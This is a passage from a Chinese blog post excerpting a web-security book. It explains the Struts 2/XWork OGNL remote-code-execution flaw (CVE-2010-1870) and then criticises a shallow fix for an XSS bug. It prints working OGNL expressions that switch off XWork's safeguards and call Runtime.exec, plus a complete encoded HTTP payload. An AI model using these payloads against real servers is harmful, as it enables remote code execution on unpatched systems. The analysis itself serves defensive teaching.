Web安全简史-broadviewbj-ChinaUnix博客

broadviewbroadview.blog.chinaunix.net

首页　| 　博文目录　| 　关于我

broadviewbj

博客访问： 1490317
博文数量： 465
博客积分： 8915
博客等级：中将
技术积分： 6365
用户组：普通用户
注册时间： 2010-07-30 15:05

文章分类

全部博文（465）

Mesos（2）
node.js（1）
司南阁（0）
TensorFlow（1）
运维（1）
JavaScript（2）
python（1）
Docker（1）
游戏（3）
Linux（1）
大数据（5）
互联网（1）
硬件安全（1）
iOS（2）
编程（1）
WebSocket（1）
编程（1）
架构（3）
Appium（1）
Spark（1）
Android（2）
Web前端（1）
IT图书（25）
操作系统（0）
操作系统（0）
网站数据分析（2）
大数据（9）
云计算（4）
编程技术（19）
开源技术（10）
非技术（5）
网络安全（8）
硬件（1）
未分配的博文（349）

文章存档

2017年（33）

2016年（2）

2015年（4）

2014年（29）

2013年（71）

2012年（148）

2011年（178）

我的朋友

相关博文

Web安全简史

分类：网络与安全

2012-04-09 17:13:23

Web框架自身安全

下面讲到的几个漏洞，都是一些流行的Web开发框架曾经出现过的严重漏洞。研究这些案例，可以帮助我们更好地理解框架安全，在使用开发框架时更加的小心，同时让我们不要迷信于开发框架的权威。

2010年7月9日，安全研究者公布了Struts 2一个远程执行代码的漏洞（CVE-2010-1870），严格来说，这其实是XWork的漏洞，因为Struts 2的核心使用的是WebWork，而WebWork又是使用XWork来处理action的。

这个漏洞的细节描述公布在exploit-db[1]上。

在这里简单摘述如下：

XWork通过getters/setters方法从HTTP的参数中获取对应action的名称，这个过程是基于OGNL(Object Graph Navigation Language)的。OGNL是怎么处理的呢？如下：

user.address.city=Bishkek&user['favoriteDrink']=kumys

会被转化成：

action.getUser().getAddress().setCity("Bishkek")

action.getUser().setFavoriteDrink("kumys")

这个过程是由ParametersInterceptor调用ValueStack.setValue()完成的，它的参数是用户可控的，由HTTP参数传入。OGNL的功能较为强大，远程执行代码也正是利用了它的功能。

* Method calling: foo()

* Static method calling: @java.lang.System@exit(1)

* Constructor calling: new MyClass()

* Ability to work with context variables: #foo = new MyClass()

* And more...

由于参数完全是用户可控的，所以XWork出于安全的目的，增加了两个方法用以阻止代码执行。

* OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (缺省为true)

* SecurityMemberAccess private field called 'allowStaticMethodAccess' (缺省为false)

但这两个方法可以被覆盖，从而导致代码执行。

#_memberAccess['allowStaticMethodAccess'] = true

#foo = new java .lang.Boolean("false")

#context['xwork.MethodAccessor.denyMethodExecution'] = #foo

#rt = @java.lang.Runtime@getRuntime()

#rt.exec('mkdir /tmp/PWNED')

ParametersInterceptor是不允许参数名称中有#的，因为OGNL中的许多预定义变量也是以#表示的。

* #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor. denyMethodExecution' property value.

* #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution.

* #root

* #this

* #_typeResolver

* #_classResolver

* #_traceEvaluations

* #_lastEvaluation

* #_keepLastEvaluation

可是攻击者在过去找到了这样的方法（bug编号XW-641）：使用\u0023来代替#，这是#的十六进制编码，从而构造出可以远程执行的攻击payload。

('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.den

yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRunti

me()))=1

最终导致代码执行成功。

Struts 2官方目前公布了几个安全补丁[2]：

Struts 2官方的补丁页面

但深入其细节不难发现，补丁提交者对于安全的理解是非常粗浅的。以S2-002的漏洞修补为例，这是一个XSS漏洞，发现者当时提交给官方的POC只是构造了script标签。

(1)test=hello

我们看看当时官方是如何修补的：

新增的修补代码：

可以看到，只是简单地替换掉

由此可见，Struts 2的开发者，本身对于安全的理解是非常不到位的。

本文节选自《白帽子讲Web安全》一书。

图书详细信息:http://blog.chinaunix.net/uid-13164110-id-3156623.html

[1]

[2] http://struts.apache.org/2.x/docs/security-bulletins.html

阅读(1301) | 评论(0) | 转发(0) |

上一篇：Web安全简史

下一篇：模式——工程化实现及扩展（设计模式Java 版）

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6